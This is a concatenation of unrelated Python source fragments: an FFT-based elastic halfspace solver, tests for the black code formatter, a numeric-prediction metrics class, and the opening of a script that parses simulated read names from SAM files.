surface_stiffness[self.greens_function != 0] = \
1. / self.greens_function[self.greens_function != 0]
return surface_stiffness
    def evaluate_disp(self, forces):
        """ Computes the displacement due to a given force array

        Keyword Arguments:
        forces -- a numpy array containing point forces (*not* pressures)

        Returns the real-space displacement field with the same shape as
        `forces`.
        """
        if forces.shape != self.nb_subdomain_grid_pts:
            raise self.Error(
                ("force array has a different shape ({0}) than this "
                 "halfspace's nb_grid_pts ({1})").format(
                    forces.shape, self.nb_subdomain_grid_pts))
        # Negated on input; evaluate_force negates on output with the same
        # convention, so the round trip is consistent.
        self.real_buffer.array()[...] = -forces
        self.fftengine.fft(self.real_buffer, self.fourier_buffer)
        # Apply the Green's function in Fourier space: u(q) = G(q) * f(q)
        self.fourier_buffer.array()[...] *= self.greens_function
        self.fftengine.ifft(self.fourier_buffer, self.real_buffer)
        # Divide by per-point area (forces -> pressures) and apply the FFT
        # engine's normalisation factor
        return self.real_buffer.array().real / \
            self.area_per_pt * self.fftengine.normalisation
    def evaluate_force(self, disp):
        """ Computes the force (*not* pressures) due to a given displacement
        array.

        Keyword Arguments:
        disp -- a numpy array containing point displacements

        Returns the real-space force field with the same shape as `disp`.
        """
        if disp.shape != self.nb_subdomain_grid_pts:
            raise self.Error(
                ("displacements array has a different shape ({0}) than "
                 "this halfspace's nb_grid_pts ({1})").format(
                    disp.shape, self.nb_subdomain_grid_pts))
        self.real_buffer.array()[...] = disp
        self.fftengine.fft(self.real_buffer, self.fourier_buffer)
        # Apply the surface stiffness in Fourier space; the leading minus on
        # the return mirrors the sign convention used in evaluate_disp
        self.fourier_buffer.array()[...] *= self.surface_stiffness
        self.fftengine.ifft(self.fourier_buffer, self.real_buffer)
        return -self.real_buffer.array().real * \
            self.area_per_pt * self.fftengine.normalisation
    def evaluate_k_disp(self, forces):
        """ Computes the K-space displacement due to a given force array

        Parameters
        __________
        forces : ndarray
            a numpy array containing point forces (*not* pressures)

        Returns
        _______
        displacement : ndarray
            displacement in k-space
        """
        if forces.shape != self.nb_subdomain_grid_pts:
            raise self.Error(
                ("force array has a different shape ({0}) than this halfspace'"
                 "s nb_grid_pts ({1})").format(
                    forces.shape, self.nb_subdomain_grid_pts))  # nopep8
        # Same sign convention as evaluate_disp; dividing by the per-point
        # area converts forces to pressures before applying G(q)
        self.real_buffer.array()[...] = -forces
        self.fftengine.fft(self.real_buffer, self.fourier_buffer)
        return self.greens_function * \
            self.fourier_buffer.array() / self.area_per_pt
    def evaluate_k_force(self, disp):
        """ Computes the K-space forces (*not* pressures) due to a given
        displacement array.

        Keyword Arguments:
        disp -- a numpy array containing point displacements

        Returns the k-space force array (surface stiffness applied to the
        transformed displacements, scaled by the per-point area).
        """
        if disp.shape != self.nb_subdomain_grid_pts:
            raise self.Error(
                ("displacements array has a different shape ({0}) than this "
                 "halfspace's nb_grid_pts ({1})").format(
                    disp.shape, self.nb_subdomain_grid_pts))  # nopep8
        self.real_buffer.array()[...] = disp
        self.fftengine.fft(self.real_buffer, self.fourier_buffer)
        # f(q) = -K(q) u(q), scaled by the per-point area
        return -self.surface_stiffness * self.fourier_buffer.array() * \
            self.area_per_pt
def evaluate_k_force_k(self, disp_k):
""" Computes the K-space forces (*not* pressures) due to a given
K-space displacement array.
Parameters
__________
disp : ndarray k-space
a numpy k-space array containing point displacements
Returns
_______
force_k : nd array k-sapce forces
"""
return -self.surface_stiffness * disp_k * self.area_per_pt
def evaluate_elastic_energy(self, forces, disp):
"""
computes and returns the elastic energy due to forces and displacements
Arguments:
forces -- array of forces
disp -- array of displacements
"""
# pylint: disable=no-self-use
return .5 * self.pnp.dot(np.ravel(disp), np.ravel(-forces))
def evaluate_scalar_product_k_space(self, ka, kb):
r"""
Computes the scalar product, i.e. the power, between the `a` and `b`,
given their fourier representation.
`Power theorem
<https://ccrma.stanford.edu/~jos/mdft/Power_Theorem.html>`_:
.. math ::
P = \sum_{ij} a_{ij} b_{ij} =
\frac{1}{n_x n_y}\sum_{ij}
\tilde a_{ij} \overline{\tilde b_{ij}}
Note that for `a`, `b` real,
.. math :: P = \sum_{kl} Re(\tilde a_{kl}) Re(\tilde b_{kl})
+ Im(\tilde a_{kl}) Im(\tilde b_{kl})
Parameters
----------
ka, kb:
arrays of complex type and of size substrate.nb_fourier_grid_pts
Fourier representation (output of a 2D rfftn) `a` (resp. `b`)
(`nx, ny` real array)
Returns
-------
P
The scalar product of a and b
"""
# ka and kb are the output of the 2D rfftn, that means the a
# part of the transform is omitted because of the symetry along the
# last dimension
#
# That's why the components whose symetrics have been omitted are
# weighted with a factor of 2.
#
# The first column (indexes [...,0], wavevector 0 along the last
# dimension) has no symetric
#
# When the number of points in the last dimension is even, the last
# column (Nyquist Frequency) has also no symetric.
#
# The serial code implementation would look like this
# if (self.nb_domain_grid_pts[-1] % 2 == 0)
# return .5*(np.vdot(ka, kb).real +
# # adding the data that has been omitted by rfftn
# np.vdot(ka[..., 1:-1], kb[..., 1:-1]).real
# # because of symetry
# )/self.nb_pts
# else :
# return .5 * (np.vdot(ka, kb).real +
# # adding the data that has been omitted by rfftn
# # np.vdot(ka[..., 1:], kb[..., 1:]).real
# # # because of symetry
# # )/self.nb_pts
#
# Parallelized Version
# The inner part of the fourier data should always be symetrized (i.e.
# multiplied by 2). When the fourier subdomain contains boundary values
# (wavevector 0 (even and odd) and ny//2 (only for odd)) these values
# should only be added once
if ka.size > 0:
if self.fourier_locations[0] == 0:
# First row of this fourier data is first of global data
fact0 = 1
elif self.nb_fourier_grid_pts[0] > 1:
# local first row is not the first in the global data
fact0 = 2
else:
fact0 = 0
if self.fourier_locations[0] == 0 and \
self.nb_fourier_grid_pts[0] == 1:
factend = 0
elif (self.nb_domain_grid_pts[0] % 2 == 1):
# odd number of points, last row have always to be symmetrized
factend = 2
elif self.fourier_locations[0] + \
self.nb_fourier_grid_pts[0] - 1 == \
| |
# <gh_stars>1-10  (repository-mirroring artifact; kept as a comment so the file parses)
#!/usr/bin/env python3
import asyncio
from concurrent.futures import ThreadPoolExecutor
from contextlib import contextmanager
from functools import partial
from io import BytesIO, TextIOWrapper
import os
from pathlib import Path
import re
import sys
from tempfile import TemporaryDirectory
from typing import Any, BinaryIO, Generator, List, Tuple, Iterator
import unittest
from unittest.mock import patch, MagicMock
from click import unstyle
from click.testing import CliRunner
import black
ll = 88
ff = partial(black.format_file_in_place, line_length=ll, fast=True)
fs = partial(black.format_str, line_length=ll)
THIS_FILE = Path(__file__)
THIS_DIR = THIS_FILE.parent
EMPTY_LINE = "# EMPTY LINE WITH WHITESPACE" + " (this comment will be removed)"
def dump_to_stderr(*output: str) -> str:
    """Join the given chunks with newlines, framed by a leading and trailing newline."""
    joined = "\n".join(output)
    return f"\n{joined}\n"
def read_data(name: str, data: bool = True) -> Tuple[str, str]:
    """read_data('test_name') -> 'input', 'output'"""
    if not name.endswith((".py", ".pyi", ".out", ".diff")):
        name += ".py"
    base_dir = THIS_DIR / "data" if data else THIS_DIR
    _input: List[str] = []
    _output: List[str] = []
    current = _input
    with open(base_dir / name, "r", encoding="utf8") as test:
        for raw_line in test.readlines():
            line = raw_line.replace(EMPTY_LINE, "")
            if line.rstrip() == "# output":
                # Everything after the marker is the expected output
                current = _output
                continue
            current.append(line)
    if _input and not _output:
        # If there's no output marker, treat the entire file as already pre-formatted.
        _output = _input[:]
    return "".join(_input).strip() + "\n", "".join(_output).strip() + "\n"
@contextmanager
def cache_dir(exists: bool = True) -> Iterator[Path]:
    """Patch black.CACHE_DIR to a fresh temporary directory for the block.

    With `exists=False` the patched path points at a not-yet-created
    subdirectory instead.
    """
    with TemporaryDirectory() as workspace:
        target = Path(workspace)
        if not exists:
            target = target / "new"
        with patch("black.CACHE_DIR", target):
            yield target
@contextmanager
def event_loop(close: bool) -> Iterator[None]:
    """Install a fresh asyncio event loop for the duration of the block.

    The previously active loop is restored on exit; the temporary loop is
    additionally closed when `close` is true.
    """
    policy = asyncio.get_event_loop_policy()
    previous = policy.get_event_loop()
    fresh = policy.new_event_loop()
    asyncio.set_event_loop(fresh)
    try:
        yield
    finally:
        policy.set_event_loop(previous)
        if close:
            fresh.close()
class BlackRunner(CliRunner):
    """Modify CliRunner so that stderr is not merged with stdout.

    This is a hack that can be removed once we depend on Click 7.x"""

    def __init__(self, stderrbuf: BinaryIO) -> None:
        self.stderrbuf = stderrbuf
        super().__init__()

    @contextmanager
    def isolation(self, *args: Any, **kwargs: Any) -> Generator[BinaryIO, None, None]:
        with super().isolation(*args, **kwargs) as output:
            saved_stderr = sys.stderr
            sys.stderr = TextIOWrapper(self.stderrbuf, encoding=self.charset)
            try:
                yield output
            finally:
                # Always restore the real stderr, even if the body raised
                sys.stderr = saved_stderr
class BlackTestCase(unittest.TestCase):
maxDiff = None
def assertFormatEqual(self, expected: str, actual: str) -> None:
if actual != expected and not os.environ.get("SKIP_AST_PRINT"):
bdv: black.DebugVisitor[Any]
black.out("Expected tree:", fg="green")
try:
exp_node = black.lib2to3_parse(expected)
bdv = black.DebugVisitor()
list(bdv.visit(exp_node))
except Exception as ve:
black.err(str(ve))
black.out("Actual tree:", fg="red")
try:
exp_node = black.lib2to3_parse(actual)
bdv = black.DebugVisitor()
list(bdv.visit(exp_node))
except Exception as ve:
black.err(str(ve))
self.assertEqual(expected, actual)
    @patch("black.dump_to_file", dump_to_stderr)
    def test_empty(self) -> None:
        """Formatting empty source yields empty output, equivalently and stably."""
        source = expected = ""
        actual = fs(source)
        self.assertFormatEqual(expected, actual)
        black.assert_equivalent(source, actual)
        black.assert_stable(source, actual, line_length=ll)
    def test_empty_ff(self) -> None:
        """format_file_in_place on an empty file reports no changes and leaves it empty."""
        expected = ""
        tmp_file = Path(black.dump_to_file())
        try:
            self.assertFalse(ff(tmp_file, write_back=black.WriteBack.YES))
            with open(tmp_file, encoding="utf8") as f:
                actual = f.read()
        finally:
            # Remove the temporary file even if the assertions above fail
            os.unlink(tmp_file)
        self.assertFormatEqual(expected, actual)
@patch("black.dump_to_file", dump_to_stderr)
def test_self(self) -> None:
    """This test file itself is already formatted the way black wants it."""
    source, expected = read_data("test_black", data=False)
    formatted = fs(source)
    self.assertFormatEqual(expected, formatted)
    black.assert_equivalent(source, formatted)
    black.assert_stable(source, formatted, line_length=ll)
    self.assertFalse(ff(THIS_FILE))
@patch("black.dump_to_file", dump_to_stderr)
def test_black(self) -> None:
    """black.py itself is already formatted the way black wants it."""
    source, expected = read_data("../black", data=False)
    formatted = fs(source)
    self.assertFormatEqual(expected, formatted)
    black.assert_equivalent(source, formatted)
    black.assert_stable(source, formatted, line_length=ll)
    self.assertFalse(ff(THIS_DIR / ".." / "black.py"))
def test_piping(self) -> None:
    """Formatting black.py through stdin/stdout yields the committed result."""
    source, expected = read_data("../black", data=False)
    err_buf = BytesIO()
    result = BlackRunner(err_buf).invoke(
        black.main, ["-", "--fast", f"--line-length={ll}"], input=source
    )
    self.assertEqual(result.exit_code, 0)
    self.assertFormatEqual(expected, result.output)
    black.assert_equivalent(source, result.output)
    black.assert_stable(source, result.output, line_length=ll)
def test_piping_diff(self) -> None:
    """--diff on stdin produces the expected diff, with timestamps normalized."""
    diff_header = re.compile(
        r"(STDIN|STDOUT)\t\d\d\d\d-\d\d-\d\d "
        r"\d\d:\d\d:\d\d\.\d\d\d\d\d\d \+\d\d\d\d"
    )
    source, _ = read_data("expression.py")
    expected, _ = read_data("expression.diff")
    config = THIS_DIR / "data" / "empty_pyproject.toml"
    err_buf = BytesIO()
    args = ["-", "--fast", f"--line-length={ll}", "--diff", f"--config={config}"]
    result = BlackRunner(err_buf).invoke(black.main, args, input=source)
    self.assertEqual(result.exit_code, 0)
    actual = diff_header.sub("[Deterministic header]", result.output)
    actual = actual.rstrip() + "\n"  # the diff output has a trailing space
    self.assertEqual(expected, actual)
@patch("black.dump_to_file", dump_to_stderr)
def test_setup(self) -> None:
    """setup.py is already formatted the way black wants it."""
    source, expected = read_data("../setup", data=False)
    formatted = fs(source)
    self.assertFormatEqual(expected, formatted)
    black.assert_equivalent(source, formatted)
    black.assert_stable(source, formatted, line_length=ll)
    self.assertFalse(ff(THIS_DIR / ".." / "setup.py"))
@patch("black.dump_to_file", dump_to_stderr)
def test_function(self) -> None:
    """tests/data/function formats to its expected output, equivalently and stably."""
    source, expected = read_data("function")
    formatted = fs(source)
    self.assertFormatEqual(expected, formatted)
    black.assert_equivalent(source, formatted)
    black.assert_stable(source, formatted, line_length=ll)
@patch("black.dump_to_file", dump_to_stderr)
def test_function2(self) -> None:
    """tests/data/function2 formats to its expected output, equivalently and stably."""
    source, expected = read_data("function2")
    formatted = fs(source)
    self.assertFormatEqual(expected, formatted)
    black.assert_equivalent(source, formatted)
    black.assert_stable(source, formatted, line_length=ll)
@patch("black.dump_to_file", dump_to_stderr)
def test_expression(self) -> None:
    """tests/data/expression formats to its expected output, equivalently and stably."""
    source, expected = read_data("expression")
    formatted = fs(source)
    self.assertFormatEqual(expected, formatted)
    black.assert_equivalent(source, formatted)
    black.assert_stable(source, formatted, line_length=ll)
def test_expression_ff(self) -> None:
    """ff() rewrites the expression fixture in place to the expected output."""
    source, expected = read_data("expression")
    tmp_file = Path(black.dump_to_file(source))
    try:
        self.assertTrue(ff(tmp_file, write_back=black.WriteBack.YES))
        with open(tmp_file, encoding="utf8") as f:
            contents = f.read()
    finally:
        os.unlink(tmp_file)
    self.assertFormatEqual(expected, contents)
    with patch("black.dump_to_file", dump_to_stderr):
        black.assert_equivalent(source, contents)
        black.assert_stable(source, contents, line_length=ll)
def test_expression_diff(self) -> None:
    """--diff output for expression.py matches tests/expression.diff."""
    source, _ = read_data("expression.py")
    expected, _ = read_data("expression.diff")
    tmp_file = Path(black.dump_to_file(source))
    diff_header = re.compile(
        rf"{re.escape(str(tmp_file))}\t\d\d\d\d-\d\d-\d\d "
        r"\d\d:\d\d:\d\d\.\d\d\d\d\d\d \+\d\d\d\d"
    )
    err_buf = BytesIO()
    try:
        result = BlackRunner(err_buf).invoke(black.main, ["--diff", str(tmp_file)])
        self.assertEqual(result.exit_code, 0)
    finally:
        os.unlink(tmp_file)
    actual = diff_header.sub("[Deterministic header]", result.output)
    actual = actual.rstrip() + "\n"  # the diff output has a trailing space
    if expected != actual:
        dump = black.dump_to_file(actual)
        msg = (
            "Expected diff isn't equal to the actual. If you made changes "
            "to expression.py and this is an anticipated difference, "
            f"overwrite tests/expression.diff with {dump}"
        )
        self.assertEqual(expected, actual, msg)
@patch("black.dump_to_file", dump_to_stderr)
def test_fstring(self) -> None:
    """tests/data/fstring formats to its expected output, equivalently and stably."""
    source, expected = read_data("fstring")
    formatted = fs(source)
    self.assertFormatEqual(expected, formatted)
    black.assert_equivalent(source, formatted)
    black.assert_stable(source, formatted, line_length=ll)
@patch("black.dump_to_file", dump_to_stderr)
def test_string_quotes(self) -> None:
    """Quotes are normalized, except under NO_STRING_NORMALIZATION mode."""
    source, expected = read_data("string_quotes")
    formatted = fs(source)
    self.assertFormatEqual(expected, formatted)
    black.assert_equivalent(source, formatted)
    black.assert_stable(source, formatted, line_length=ll)
    mode = black.FileMode.NO_STRING_NORMALIZATION
    untouched = fs(source, mode=mode)
    self.assertFormatEqual(source, untouched)
    black.assert_equivalent(source, untouched)
    black.assert_stable(source, untouched, line_length=ll, mode=mode)
@patch("black.dump_to_file", dump_to_stderr)
def test_slices(self) -> None:
    """tests/data/slices formats to its expected output, equivalently and stably."""
    source, expected = read_data("slices")
    formatted = fs(source)
    self.assertFormatEqual(expected, formatted)
    black.assert_equivalent(source, formatted)
    black.assert_stable(source, formatted, line_length=ll)
@patch("black.dump_to_file", dump_to_stderr)
def test_comments(self) -> None:
    """tests/data/comments formats to its expected output, equivalently and stably."""
    source, expected = read_data("comments")
    formatted = fs(source)
    self.assertFormatEqual(expected, formatted)
    black.assert_equivalent(source, formatted)
    black.assert_stable(source, formatted, line_length=ll)
@patch("black.dump_to_file", dump_to_stderr)
def test_comments2(self) -> None:
    """tests/data/comments2 formats to its expected output, equivalently and stably."""
    source, expected = read_data("comments2")
    formatted = fs(source)
    self.assertFormatEqual(expected, formatted)
    black.assert_equivalent(source, formatted)
    black.assert_stable(source, formatted, line_length=ll)
@patch("black.dump_to_file", dump_to_stderr)
def test_comments3(self) -> None:
    """tests/data/comments3 formats to its expected output, equivalently and stably."""
    source, expected = read_data("comments3")
    formatted = fs(source)
    self.assertFormatEqual(expected, formatted)
    black.assert_equivalent(source, formatted)
    black.assert_stable(source, formatted, line_length=ll)
@patch("black.dump_to_file", dump_to_stderr)
def test_comments4(self) -> None:
    """tests/data/comments4 formats to its expected output, equivalently and stably."""
    source, expected = read_data("comments4")
    formatted = fs(source)
    self.assertFormatEqual(expected, formatted)
    black.assert_equivalent(source, formatted)
    black.assert_stable(source, formatted, line_length=ll)
@patch("black.dump_to_file", dump_to_stderr)
def test_comments5(self) -> None:
    """tests/data/comments5 formats to its expected output, equivalently and stably."""
    source, expected = read_data("comments5")
    formatted = fs(source)
    self.assertFormatEqual(expected, formatted)
    black.assert_equivalent(source, formatted)
    black.assert_stable(source, formatted, line_length=ll)
@patch("black.dump_to_file", dump_to_stderr)
def test_cantfit(self) -> None:
    """tests/data/cantfit formats to its expected output, equivalently and stably."""
    source, expected = read_data("cantfit")
    formatted = fs(source)
    self.assertFormatEqual(expected, formatted)
    black.assert_equivalent(source, formatted)
    black.assert_stable(source, formatted, line_length=ll)
@patch("black.dump_to_file", dump_to_stderr)
def test_import_spacing(self) -> None:
    """tests/data/import_spacing formats to its expected output, equivalently and stably."""
    source, expected = read_data("import_spacing")
    formatted = fs(source)
    self.assertFormatEqual(expected, formatted)
    black.assert_equivalent(source, formatted)
    black.assert_stable(source, formatted, line_length=ll)
@patch("black.dump_to_file", dump_to_stderr)
def test_composition(self) -> None:
    """tests/data/composition formats to its expected output, equivalently and stably."""
    source, expected = read_data("composition")
    formatted = fs(source)
    self.assertFormatEqual(expected, formatted)
    black.assert_equivalent(source, formatted)
    black.assert_stable(source, formatted, line_length=ll)
@patch("black.dump_to_file", dump_to_stderr)
def test_empty_lines(self) -> None:
    """tests/data/empty_lines formats to its expected output, equivalently and stably."""
    source, expected = read_data("empty_lines")
    formatted = fs(source)
    self.assertFormatEqual(expected, formatted)
    black.assert_equivalent(source, formatted)
    black.assert_stable(source, formatted, line_length=ll)
@patch("black.dump_to_file", dump_to_stderr)
def test_string_prefixes(self) -> None:
    """tests/data/string_prefixes formats to its expected output, equivalently and stably."""
    source, expected = read_data("string_prefixes")
    formatted = fs(source)
    self.assertFormatEqual(expected, formatted)
    black.assert_equivalent(source, formatted)
    black.assert_stable(source, formatted, line_length=ll)
@patch("black.dump_to_file", dump_to_stderr)
def test_python2(self) -> None:
    """Python 2 syntax formats stably (AST equivalence is not checkable here)."""
    source, expected = read_data("python2")
    formatted = fs(source)
    self.assertFormatEqual(expected, formatted)
    # black.assert_equivalent(source, formatted)
    black.assert_stable(source, formatted, line_length=ll)
@patch("black.dump_to_file", dump_to_stderr)
def test_python2_unicode_literals(self) -> None:
    """Python 2 unicode_literals fixture formats stably."""
    source, expected = read_data("python2_unicode_literals")
    formatted = fs(source)
    self.assertFormatEqual(expected, formatted)
    black.assert_stable(source, formatted, line_length=ll)
@patch("black.dump_to_file", dump_to_stderr)
def test_stub(self) -> None:
    """.pyi stubs are formatted with the dedicated PYI mode."""
    mode = black.FileMode.PYI
    source, expected = read_data("stub.pyi")
    formatted = fs(source, mode=mode)
    self.assertFormatEqual(expected, formatted)
    black.assert_stable(source, formatted, line_length=ll, mode=mode)
@patch("black.dump_to_file", dump_to_stderr)
def test_fmtonoff(self) -> None:
    """tests/data/fmtonoff formats to its expected output, equivalently and stably."""
    source, expected = read_data("fmtonoff")
    formatted = fs(source)
    self.assertFormatEqual(expected, formatted)
    black.assert_equivalent(source, formatted)
    black.assert_stable(source, formatted, line_length=ll)
@patch("black.dump_to_file", dump_to_stderr)
def test_fmtonoff2(self) -> None:
    """tests/data/fmtonoff2 formats to its expected output, equivalently and stably."""
    source, expected = read_data("fmtonoff2")
    formatted = fs(source)
    self.assertFormatEqual(expected, formatted)
    black.assert_equivalent(source, formatted)
    black.assert_stable(source, formatted, line_length=ll)
@patch("black.dump_to_file", dump_to_stderr)
def test_remove_empty_parentheses_after_class(self) -> None:
    """Empty parentheses after a class name are removed as expected."""
    source, expected = read_data("class_blank_parentheses")
    formatted = fs(source)
    self.assertFormatEqual(expected, formatted)
    black.assert_equivalent(source, formatted)
    black.assert_stable(source, formatted, line_length=ll)
@patch("black.dump_to_file", dump_to_stderr)
def test_new_line_between_class_and_code(self) -> None:
    """Blank-line handling between a class and following code is as expected."""
    source, expected = read_data("class_methods_new_line")
    formatted = fs(source)
    self.assertFormatEqual(expected, formatted)
    black.assert_equivalent(source, formatted)
    black.assert_stable(source, formatted, line_length=ll)
def test_report_verbose(self) -> None:
report = black.Report(verbose=True)
out_lines = []
err_lines = []
def out(msg: str, **kwargs: Any) -> None:
out_lines.append(msg)
def err(msg: str, **kwargs: Any) -> None:
err_lines.append(msg)
with patch("black.out", out), patch("black.err", err):
report.done(Path("f1"), black.Changed.NO)
self.assertEqual(len(out_lines), 1)
self.assertEqual(len(err_lines), 0)
self.assertEqual(out_lines[-1], "f1 already well formatted, good job.")
self.assertEqual(unstyle(str(report)), "1 file left unchanged.")
self.assertEqual(report.return_code, 0)
report.done(Path("f2"), black.Changed.YES)
self.assertEqual(len(out_lines), 2)
self.assertEqual(len(err_lines), 0)
self.assertEqual(out_lines[-1], "reformatted f2")
self.assertEqual(
unstyle(str(report)), "1 file reformatted, 1 file left unchanged."
)
report.done(Path("f3"), black.Changed.CACHED)
self.assertEqual(len(out_lines), 3)
self.assertEqual(len(err_lines), 0)
self.assertEqual(
out_lines[-1], "f3 wasn't modified on disk since last run."
)
self.assertEqual(
unstyle(str(report)), "1 file reformatted, 2 files left unchanged."
)
self.assertEqual(report.return_code, 0)
report.check = True
self.assertEqual(report.return_code, 1)
report.check = False
| |
"""Subclass of prediction specialized in representing numeric predictions, thus
a prediction where both fitted and real data are either ints or floats.
It allows to compute accuracy metrics that represent the distance between
the prediction and the real values."""
from __future__ import annotations
from typing import TYPE_CHECKING
import numpy as np
import pandas as pd
from matplotlib import pyplot as plt
from matplotlib.axes import Axes
from easypred import Prediction
if TYPE_CHECKING:
from easypred.type_aliases import VectorPdNp
class NumericPrediction(Prediction):
"""Subclass of Prediction specialized in representing numeric predictions.
Attributes
-------
fitted_values: np.ndarray | pd.Series
The array-like object of length N containing the fitted values.
real_values: np.ndarray | pd.Series
The array-like object containing the N real values.
Examples
-------
>>> from easypred import NumericPrediction
>>> pred = NumericPrediction([7, 1, 3, 4, 5], [6.5, 2, 4, 3, 5])
>>> pred.real_values
array([7, 1, 3, 4, 5])
>>> pred.fitted_values
array([6.5, 2. , 4. , 3. , 5. ])
"""
@property
def r_squared(self) -> float:
    """Coefficient of determination, computed as the square of the
    correlation coefficient between real and fitted values.

    References
    ---------
    https://en.wikipedia.org/wiki/Coefficient_of_determination
    """
    correlation = np.corrcoef(self.real_values, self.fitted_values)[0, 1]
    return correlation ** 2
@property
def mse(self) -> float:
    """Mean Squared Error: the mean of the squared residuals.

    References
    ---------
    https://en.wikipedia.org/wiki/Mean_squared_error
    """
    squared_errors = self.residuals(squared=True)
    return np.mean(squared_errors)
@property
def rmse(self) -> float:
    """Root Mean Squared Error: the square root of the MSE.

    References
    ---------
    https://en.wikipedia.org/wiki/Root-mean-square_deviation
    """
    mean_squared_error = self.mse
    return np.sqrt(mean_squared_error)
@property
def mae(self) -> float:
    """Mean Absolute Error: the mean of the absolute residuals.

    References
    ---------
    https://en.wikipedia.org/wiki/Mean_absolute_error
    """
    absolute_errors = self.residuals(absolute=True)
    return np.mean(absolute_errors)
@property
def mape(self) -> float:
    """Mean Absolute Percentage Error: the mean of the absolute
    residuals taken relative to the real values.

    References
    ---------
    https://en.wikipedia.org/wiki/Mean_absolute_percentage_error
    """
    relative_errors = self.residuals(absolute=True, relative=True)
    return np.mean(relative_errors)
def residuals(
    self,
    squared: bool = False,
    absolute: bool = False,
    relative: bool = False,
) -> VectorPdNp:
    """Return the differences between real and fitted values.

    Parameters
    ----------
    squared : bool, optional
        If True, return the squared residuals. Takes precedence over
        ``absolute``. By default False.
    absolute : bool, optional
        If True, return the residuals in absolute value. By default False.
    relative : bool, optional
        If True, divide the residuals by the real values first, giving a
        relative measure. By default False.

    Returns
    -------
    np.ndarray or pd.Series
        Array-like of shape (N,); the concrete type mirrors the type of
        real_values / fitted_values.
    """
    errors = self.real_values - self.fitted_values
    if relative:
        # NOTE(review): real values equal to zero would divide by zero here.
        errors = errors / self.real_values
    if squared:
        errors = errors ** 2
    elif absolute:
        errors = abs(errors)
    return errors
def matches_tolerance(self, tolerance: float = 0.0) -> VectorPdNp:
    """Return a boolean array marking predictions within *tolerance*.

    Parameters
    ----------
    tolerance : float, optional
        Maximum absolute difference between a real value and its fitted
        counterpart for the pair to count as a match. By default 0.0.

    Returns
    -------
    np.ndarray or pd.Series
        Boolean array of shape (N,); the concrete type mirrors the type
        of self.real_values.
    """
    distances = abs(self.real_values - self.fitted_values)
    return distances <= tolerance
def as_dataframe(self) -> pd.DataFrame:
    """Return a per-observation summary of the prediction quality.

    Returns
    -------
    pd.DataFrame
        Dataframe of shape (N, 5) with fitted value, real value, exact
        match flag, absolute difference, and relative difference for each
        observation.
    """
    errors = self.residuals()
    summary = {
        "Fitted Values": self.fitted_values,
        "Real Values": self.real_values,
        "Prediction Matches": self.matches(),
        "Absolute Difference": errors,
        "Relative Difference": errors / self.real_values,
    }
    return pd.DataFrame(summary)
def describe(self) -> pd.DataFrame:
    """Return the key accuracy metrics of the prediction.

    Returns
    -------
    pd.DataFrame
        Dataframe of shape (6, 1) with one row per metric (N, MSE, RMSE,
        MAE, MAPE, R^2) and a single "Value" column.
    """
    metrics = {
        "N": [len(self)],
        "MSE": self.mse,
        "RMSE": self.rmse,
        "MAE": self.mae,
        "MAPE": self.mape,
        "R^2": self.r_squared,
    }
    return pd.DataFrame(metrics, index=["Value"]).transpose()
def plot_fit_residuals(
    self,
    figsize: tuple[int, int] = (20, 10),
    title_size: int = 14,
    axes_labels_size: int = 12,
    axs: list[Axes] | None = None,
    **kwargs,
) -> np.ndarray:
    """Draw a two-panel figure: real-vs-fitted and residuals-vs-fitted.

    Combines plot_fit and plot_residuals, which helps spotting biases,
    deviations and clusters in the prediction.

    Parameters
    ----------
    figsize : tuple[int, int], optional
        Size of the figure created when *axs* is not given. Default (20, 10).
    title_size : int, optional
        Font size of the subplot titles. Default 14.
    axes_labels_size : int, optional
        Font size of the axes labels. Default 12.
    axs : list of matplotlib Axes, optional
        Two axes to draw onto; if omitted a new figure with two subplots
        is created.
    kwargs : key, value mappings
        Forwarded to matplotlib.pyplot.scatter() of each subplot.

    Returns
    -------
    np.ndarray
        NumPy array of shape (2,) holding the two matplotlib Axes.
    """
    if axs is None:
        _, axs = plt.subplots(nrows=1, ncols=2, figsize=figsize)
    shared = {"title_size": title_size, "axes_labels_size": axes_labels_size}
    self.plot_fit(ax=axs[0], **shared, **kwargs)
    self.plot_residuals(ax=axs[1], **shared, **kwargs)
    return axs
def plot_residuals(
self,
figsize: tuple[int, int] = (20, 10),
hline: int | None = 0,
title_size: int = 14,
axes_labels_size: int = 12,
ax: Axes | None = None,
**kwargs,
) -> Axes:
"""Plot the scatterplot depicting the residuals against fitted values.
Parameters
----------
figsize : tuple[int, int], optional
Tuple of integers specifying the size of the plot. Default is
(20, 10).
hline : int, optional
Y coordinate of the red dashed line added to the scatterplot. If
None, no line is drawn. By default is 0.
title_size : int, optional
| |
# Repository: langmead-lab/FORGe
#! /usr/bin/env python
"""
Given a SAM file with read names in Mason 1 format, Qsim tandem read format,
Extended wgsim format, or Bowtie 2 --hints format, measure how many are
correct.
"""
from __future__ import print_function
import sys
import re
"""
Example: 10_26049747_26049846_0:0:0_0:0:0_100_100_0_3999999
offset is 0-based?
"""
_wgsimex_re = re.compile('(.+)_([^_]+)_([^_]+)_([^:]+):([^:]+):([^_]+)_([^:]+):([^:]+):([^_]+)_([^_]+)_([^_]+)_([^_]+)_([^/]+).*')
# 1 2 3 4 5 6 7 8 9 10 11 12 13
def name_is_extended_wgsim(nm):
return _wgsimex_re.match(nm) is not None
def pos_from_extended_wgsim(name, mate2=False):
res = _wgsimex_re.match(name)
refid, fragst1, fragen1 = res.group(1), int(res.group(2))-1, int(res.group(3))-1
len1, len2 = int(res.group(10)), int(res.group(11))
flip = res.group(12) == '1'
ln = len2 if mate2 else len1
if flip == mate2:
return refid, fragst1, True
else:
return refid, fragen1 - (ln-1), False
"""
Example: qsim!:GL000229.1:+:6005:100:u
pretty sure offset is 0-based
"""
_qsim_re = re.compile('qsim!:([^:]+):([+-]):([^:]+):.*')
def name_is_qsim(nm):
return _qsim_re.match(nm) is not None
def pos_from_qsim(name):
res = _qsim_re.match(name)
return res.group(1), int(res.group(3)), res.group(2) == '+'
"""
Example: !h!chr9!118085975!+!50!0
offset is 0-based
"""
_hint_seed_re = re.compile('!h!([^!]+)!([0-9]+)!([+-])!([0-9]+)!([0-9]+)')
_hint_ival_re = re.compile('!h!([^!]+)!([0-9]+)!([0-9]+)!([0-9]+)!([0-9]+)')
def name_is_hint(name):
return _hint_seed_re.match(name) or _hint_ival_re.match(name)
def pos_from_hint(name):
res = _hint_seed_re.match(name)
if res is not None:
return res.group(1), int(res.group(2)), res.group(3) == '+'
raise RuntimeError("Can't really check interval hints since strand and exact offset are missing")
"""
Example:
